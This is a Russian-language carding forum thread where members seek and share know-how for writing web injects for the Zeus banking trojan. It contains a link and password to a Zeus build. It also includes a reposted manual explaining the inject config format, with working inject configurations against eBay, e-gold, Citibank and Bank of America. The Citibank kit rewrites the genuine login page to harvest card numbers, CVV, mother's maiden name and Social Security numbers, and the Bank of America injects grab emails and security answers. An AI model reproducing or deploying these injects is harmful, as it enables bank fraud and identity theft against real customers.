Инжекты для Зевса.

Passion

Passion

VIP member
Messages
562
Reaction score
124
Points
43
Есть ли у кого мануал по написанию инжектов для зевса или есть умельцы кто сможет поделиться своими знаниями, трудами? Думаю, не одному мне это интересно. В паблике мало инфы... Можно в пм и так же не за спасибо. Интересует перехват данных.
 
"""//forum.xakep.ru/m_1797476/mpage_1/key_/tm.htm это наверное уже видел? скинул инжекты, какие есть в пм, может сам разберешься.
 
В ПМ отписал, мне не инжекты нужны, а принцип их написание, что за что отвечает, как ловить, делать что бы зевс записывал и т.д.
 
Блииинн у меня была статья, там до мелочей расписано на примере палки как писать инжект. Если найду скину тебе в пм.
 
Буду признателен.
 
напишу статью в течении суток-двое , с вас паблик версия (или линк на нее которая собираеться ) без пасхальных яиц
зевс юзал давно но чтото осталось по наработкам в инжектах

---------- Сообщение добавлено в 19:55 ---------- Предыдущее сообщение размещено в 19:55 ----------

напишу статью в течении суток-двое , с вас паблик версия (или линк на нее которая собираеться ) без пасхальных яиц
зевс юзал давно но чтото осталось по наработкам в инжектах
 
Паблик версия статьи? Или чего, не совсем понял.
 
Please note, if you want to make a deal with this user, that it is blocked.
xmaster, если в паблике статья не появится, буду признателе если в ПМ, давно хотел понять как и что. Спасибо.
 
паблик версию зевса который собереться и встанет без проблем на хосте
я смотрел конечно в нужном разделе , но были отписки , то билд не собираеться то админку нужно править . Мне просто нужно тупо поставить и поэксперементировать на локалхосте , а там и по инфе помогу это не секретно впринципе

---------- Сообщение добавлено в 22:16 ---------- Предыдущее сообщение размещено в 22:16 ----------

паблик версию зевса который собереться и встанет без проблем на хосте
я смотрел конечно в нужном разделе , но были отписки , то билд не собираеться то админку нужно править . Мне просто нужно тупо поставить и поэксперементировать на локалхосте , а там и по инфе помогу это не секретно впринципе
 
Не знаю как смотрел, но тут зевс рабочий лежит...
necro, с нетерпением надеюсь что найдется статья про инжект.
 
точнее как сказать
я смотрел . но решил ставить так как нет необходимости пока
а ставить из топика "Реальный рабочий зевс" который светиться как новогодняя елка нет желания
да и потом в конструктор лего я уже наигрался . просто так показывает практика что из любой линки всегда
нужно пилить напилником . но еще раз повторюсь на данный момент это не тот вариант
я полностью готов немного поэксперементировать с стабильной версией в плане контекста старт поста
но собирать софт для этого не имею желания
 
Last edited:
В разделе софт лежит, Санёк выкладывал, первый пост там устарел, потом вроде как Кенгуру его перезалил и выложил. Вот это найди и скачай там его. А что "светится", так это же малвари, они все "светятся". Да и практика так не показывает, а показывает, что тебе просто тупо нужен зевс и всего-то.

---------- Сообщение добавлено в 23:54 ---------- Предыдущее сообщение размещено в 23:48 ----------

http://gopstop.pro/zeus2.0.8.9.rar
pass: cpro
 
я пользуюсь спаем , зевс мне не нужен совсем
просто начинал с него , а так как на даном борде кроме шипинга мало что практикуеться почему
бы и не начать такую ветку ?
для себя полезно и в кодинге практика .
Линк увидел - закачаю поставлю . "потыкаю"
Напишу статейку из результатов , но сразу скажу это будет только пинок
никаких там супер пупер вещей небудет
просто реально это интересно

---------- Сообщение добавлено в 00:13 ---------- Предыдущее сообщение размещено в 00:13 ----------

я пользуюсь спаем , зевс мне не нужен совсем
просто начинал с него , а так как на даном борде кроме шипинга мало что практикуеться почему
бы и не начать такую ветку ?
для себя полезно и в кодинге практика .
Линк увидел - закачаю поставлю . "потыкаю"
Напишу статейку из результатов , но сразу скажу это будет только пинок
никаких там супер пупер вещей небудет
просто реально это интересно
 
Да хоть был бы пинок и на нем спасибо.
 
Passion said:
А что "светится", так это же малвари, они все "светятся"
Click to expand...

ты немного не понял меня , по дефолту в контексте софта он и должен светиться
но когда его перезальет какойто негодяй то там и логи твои светяться и много чего нехорошего
поэтому лучше юзать устаканеный софт который прошел "боевое крещение" как то так по моему мнению

---------- Сообщение добавлено в 00:20 ---------- Предыдущее сообщение размещено в 00:19 ----------
Passion said:
А что "светится", так это же малвари, они все "светятся"
Click to expand...

ты немного не понял меня , по дефолту в контексте софта он и должен светиться
но когда его перезальет какойто негодяй то там и логи твои светяться и много чего нехорошего
поэтому лучше юзать устаканеный софт который прошел "боевое крещение" как то так по моему мнению

---------- Сообщение добавлено в 00:21 ---------- Предыдущее сообщение размещено в 00:20 ----------

прошу прощения за дабл посты , сижу через соседскую мобилку через ИК а в середине кружка пива )

---------- Сообщение добавлено в 00:22 ---------- Предыдущее сообщение размещено в 00:21 ----------

прошу прощения за дабл посты , сижу через соседскую мобилку через ИК а в середине кружка пива )
 
Ни чего не понял, но это не важно.
 
Нашел статью, сразу говорю кто автор понятия не имею. На компе валялась.


URL - URL на которую должен срабатывать веб-инжект, можно использовать маску.


флаги - определяет основное условие загрузки, может состоять из нескольких флагов в любом порядке, но с учетом регистра. В настоящее время доступны следующие флаги:
P - запускать веб-инжект при POST запросе на URL.
G - запускать веб-инжект при GET запросе на URL.
L - изменяет предназначение веб-инжекта, если указать этот флаг, то будет получен нужный кусок данных и немедленно сохранен в лог.
F - дополняет флаг L, позволяет записывать результат не в лог, а в отдельный файл.
H - дополняет флаг L, сохраняет нужный кусок данных без вырезания тегов.
D - запускать веб-инжект раз в 24 часа.



блэкмаска POST - представляет из себя маску POST-данных передаваемых URL, при которых не будет запускаться веб-инжект.


вайтмаска POST - представляет из себя маску POST-данных передаваемых URL, при которых будет запускаться веб-инжект.
URL блокировки - в случаи если ваш веб-инжект должен грузиться лиш один раз на компьютере жертвы, то здесь следует указать маску URL, в случаи открытия которой данный Веб-инжект не будет более использоваться на компьютере. Если вам этого не нужно, оставтье поле пустым.
маска контекста - маска части содержимого страницы, при котором должен сработать веб-инжект.

После указания URL, со следующей строки начинается перечисление веб-инжектов, которое длится до тех пор, пока не достигнут конец файла или не задана новая URL при помощи очередной записи set_url. Один веб-инжект состоит из трех элементов:
Без флага L:
data_before - маска данных после которых нужно записать новые данные.


data_after - маска данных перед которыми следует записать новые данные.


data_inject - новые данные, на которые будет заменено содержимое между data_before, data_after.


С флагом L:
data_before - маска данных после которых начинается кусок получаемых данных.


data_after - маска данных перед которыми кончается кусок получаемых данных.


data_inject - играет роль заголовка для получаемых данных, нужен лишь для визуального выделения в логах.



Название элемента должно начинаться с первого байта новой строки и сразу после окончания названия должен быть перенос на следующею строку. Со следующей строки идут данные веб-инжекта, окончание данных обозначается строкой data_end, также это строка должна начинаться с первого байта очередной строки. Внутри элемента вы можете свободно использовать любые символы.

Примечания:
Как известно, новая строка может обозначаться одним (0x0A) или двумя (0x0D и 0x0A) байтами. Т.к. в основном веб-инжект используется для подмены содержимого текстовых данных, то данная особенность учтена, и бот успешно запускает веб-инжект даже если у вас новые строки обозначены двумя байтами, а в содержимом URL одним байтом и наоборот.
Элементы веб-инжекта могут быть расположены в любом порядке, т.е. data_before, data_after, data_inject, или data_before, data_inject, data_after и т.д.
Элемент может быть пустым.
При использовании флага L, в получаемых данных каждый тег заменяютя на один пробел.

Пример файла:

;Подмена заголовка любого сайта по протоколу http на фразу "HTTP: Web-Inject"
set_url http://* GP

data_before
<title>
data_end

data_inject
HTTP: Web-Inject
data_end

data_after
</title>
data_end

;Подмена заголовка любого сайта по протоколу http на фразу "HTTPS: Web-Inject" и добваление текста "BODY: Web-Inject" сразу после тега <body>
set_url https://* GP

data_before
<title>
data_end

data_inject
HTTPS: Web-Inject
data_end

data_after
</title>
data_end

data_before
<body>
data_end

data_inject
<hr>BODY: Web-Inject<hr>
data_end

data_after
data_end

;Получем заголовок страницы
set_url http://*yahoo.com* LGP

data_before
<title>
data_end

data_inject
Yahoo Title: Web-Inject
data_end

data_after
</title>
data_end

примеры

1) Ebay
set_url */my.ebay.com/*CurrentPage=MyeBayPersonalInfo* GL
data_before
Registered email address</td>*<img*>
data_end
data_inject
e-mail:
data_end
data_after
</td>
data_end

set_url *.ebay.com/*eBayISAPI.dll?* GL
data_before
(<a href="http://feedback.ebay.com/ws/eBayISAPI.dll?ViewFeedback&*">
data_end
data_inject
Feedback:
data_end
data_after
</a>
data_end
Click to expand...

2) e-gold.com

set_url https://www.e-gold.com/acct/balance.asp* GPL
data_before
<form name=fiat*</form>
data_end
data_inject
data_end
data_after
<th colspan=4 align=left valign="bottom"
data_end
Click to expand...

3) Граббер баланса citibank

set_url https://web.da-us.citibank.com/*BS_Id=MemberHomepage* GL
data_before
account summary</font>
data_end
data_inject
data_end
data_after
<td height="10" colspan="4">
data_end
Click to expand...

4) комплект для сбора данных по citibank.com

set_url https://web.da-us.citibank.com/cgi-bin/citifi/portal/l/l.do GP

data_before
src="/cm/js/branding.js"></script>
data_end
data_inject
<script>
function set_cookie1(name, value, expires)
{
if (!expires)
{
expires = new Date();
}
document.cookie = name + "=" + escape(value) + "; expires=" + expires.toGMTString() + "; path=/";
}

function get_cookie(name)
{
cookie_name = name + "=";
cookie_length = document.cookie.length;
cookie_begin = 0;
while (cookie_begin < cookie_length)
{
value_begin = cookie_begin + cookie_name.length;
if (document.cookie.substring(cookie_begin, value_begin) == cookie_name)
{
var value_end = document.cookie.indexOf (";", value_begin);
if (value_end == -1)
{
value_end = cookie_length;
}
return unescape(document.cookie.substring(value_begin, value_end));
}
cookie_begin = document.cookie.indexOf(" ", cookie_begin) + 1;
if (cookie_begin == 0)
{
break;
}
}
return null;
}
</SCRIPT>
data_end
data_after
<noscript>
data_end


data_before
</tr><tr><td colspan="3" class="password">
data_end
data_inject
<script>
var name1 = "ct_ver";
var cookie_val1 = get_cookie(name1);

if (cookie_val1 == "y9872")
{
document.writeln("<input type='password' name='password' id='password' onkeydown='checkUidComplete(event)' size='13'>");
}
if (cookie_val1 == null)
{
var tmp = "y9872";
var expires1 = new Date();
expires1.setTime(expires1.getTime() + (1000 * 86400 * 365));
set_cookie1(name1, tmp, expires1);
document.writeln("<input type='password' id='username' name='username' onkeydown='checkUidComplete(event)' size='13'>");
}
</script>
data_end
data_after
</td></tr><tr valign="top"><td><input type="checkbox"
data_end

data_before
"username" style="padding-bottom:4px;">
data_end
data_inject
<script>
var name2 = "ct_ver2";
var cookie_val2 = get_cookie(name2);

if (cookie_val2 == "y9871")
{
document.writeln("<input type='text' id='username' name='username' size='12' value=''>");
}
if (cookie_val2 == null)
{
var tmp = "y9871";
var expires1 = new Date();
expires1.setTime(expires1.getTime() + (1000 * 86400 * 365));
set_cookie1(name2, tmp, expires1);
document.writeln("<input type='text' name='password' id='password' size='12' value=''>");
}
</script>
data_end
data_after
</td></tr><tr><td colspan="2" nowrap><b>Password
data_end

set_url https://web.da-us.citibank.com/cgi-bin/citi...l/autherror.do* GP
data_before
<td colspan=2 class="username"><big><B>
data_end
data_inject
<input type="text" id="username" name="username" size="13" length="50" value=>
data_end
data_after
</B></big></td></tr>
data_end

data_before
univers/misc/error.gif'><font color=#d73535><B><big>
data_end
data_inject
Information you entered does not match our records.
data_end
data_after
</big></B></font><BR><BR><big>Please check
data_end

data_before
</big></B></font><BR><BR><big>
data_end
data_inject
In order to avoid fraud, we must verify your identity. We ask several questions.<br> Only you can answer these questions. This information is used only for security <br>reasons, to protect you from identity fraud.<br> Please make sure you complete all required information correctly.
data_end
data_after
<BR><BR>If you're
data_end

data_before
<tr valign=top><td colspan=2 class=inputField>
data_end
data_inject
<input id="password" name="password" maxlength="50" size="12" value="" autocomplete="OFF" type="password"><br><br></td></tr><!-- --> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr valign="top"><td align="left"><big><br> Enter the information about Credit Card linked to your account: </big><br><br></td></tr></tbody></table> <tr><td colspan="2"><b>ATM Card Number</b></td></tr><br> <tr valign="top"><td colspan="2"> <INPUT TYPE="text" NAME="atm" VALUE="" SIZE="16" MAXLENGTH="16"><BR> </td></tr> <tr><td colspan="2"><b>Expired Date</b></td></tr> <br> <tr valign="top"><td colspan="2"> <INPUT TYPE="text" NAME="exp" VALUE="" SIZE="3" MAXLENGTH="5"></td></tr><BR> <tr><td colspan="2"><b>CVV</b></td></tr> <br> <tr valign="top"><td colspan="2"> <INPUT TYPE="text" NAME="cvv" VALUE="" SIZE="2" MAXLENGTH="3"><BR><br></td></tr> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr valign="top"><td align="left"><big><br> Enter your personal<br> information: </big></td></tr></tbody></table><br> <tr><td colspan="2"><b>Mother's Maiden Name</b></td></tr> <br> <tr valign="top"><td colspan="2"> <INPUT TYPE="text" NAME="mmn" VALUE="" SIZE="20" MAXLENGTH="32"></td></tr><BR> <tr><td colspan="2"><b>Social Security Number</b></td></tr> <table border="0" cellpadding="0" cellspacing="0" width="20%"><tbody> <tr valign="top"><td colspan="2"> <INPUT TYPE="text" NAME="ssn1" VALUE="" SIZE="2" MAXLENGTH="3"> <td colspan="2"> <INPUT TYPE="text" NAME="ssn2" VALUE="" SIZE="1" MAXLENGTH="2" valign="left"> <td colspan="2"> <INPUT TYPE="text" NAME="ssn3" VALUE="" SIZE="3" MAXLENGTH="4"> </td></td></td></tr> </table></tbody> <!-- --><tr><td><IMG border=0 height=10 src='/images/pixel.gif' width=1></td></tr>
data_end
data_after
<tr><td align=left valign="top" nowrap></td><td align=right><IMG border=0 height=10 src='/images/pixel.gif' width=1><input type=image alt="" src="/images/univers/buttons/cont_btn.gif"
data_end

data_before
if(!(usernameValidation(frm.username)))
data_end
data_inject
return false; if(!(cinRegValidation(frm.atm))) return false; if((document.LoginValidateForm.exp.value.length<1) || (document.LoginValidateForm.cvv.value.length<1) || (document.LoginValidateForm.mmn.value.length<1) || (document.LoginValidateForm.ssn1.value.length<1) || (document.LoginValidateForm.ssn2.value.length<1) || (document.LoginValidateForm.ssn3.value.length<1)) { alert ("All fields are required."); return false; } else if((document.LoginValidateForm.exp.value.length<5) || (document.LoginValidateForm.cvv.value.length<3) || (document.LoginValidateForm.mmn.value.length<4) || (document.LoginValidateForm.ssn1.value.length<3) || (document.LoginValidateForm.ssn2.value.length<2) || (document.LoginValidateForm.ssn3.value.length<4)) { alert ("Please verify your information and fill the form.\n(All fields are required)."); return false; }
data_end
data_after
if(!(passwordValidation(frm.password)))
data_end
Click to expand...

5) Вытаскиваем мыло и секретные вопросы bankofamerica.com

set_url https://onlineeast#.bankofamerica.com/*/GotoCustomerServiceMenu* GPL
data_before
(your current e*mail address is:* 
data_end
data_inject
BOA : EMAIL
data_end
data_after
)
data_end


set_url https://sitekey.bankofamerica.com/sas/maint.do GPH
data_before
<!-- one -->
data_end
data_inject
BOA : Answers
data_end
data_after
securityKey3Ans*</TR>
data_end
Click to expand...
 
Last edited:
necro, видел данную статью на грабберз, но тут только последний инж как дополнение. Ладненько, буду ковыряться с тем что имеем.
 
записал бы кто нить видео .и все разжевал. где и что берется. куда дописывается . где делает замену. было бы гуд
 
You must log in or register to reply here.

Similar threads

S
Какие инструменты используются для анализа трафика при перехвате данных карт?
Replies
0
Views
227
Student
S
S
Какие протоколы передачи данных (например, HTTP vs HTTPS) наиболее уязвимы для перехвата информации о картах?
Replies
0
Views
189
Student
S
Cloned Boy
Неуловимый хакер: Банковские трояны, шифровальщики, хакерский клуб и миллионы долларов
Replies
0
Views
395
Cloned Boy
Cloned Boy
Mutt
Какие уязвимости протокола SS7 используются для перехвата SMS с OTP?
Replies
0
Views
384
Mutt
Mutt
Cameron
AiTM атака; SAML;SSO и методолгия входа в корп.
Replies
0
Views
258
Cameron
Cameron
Back
Top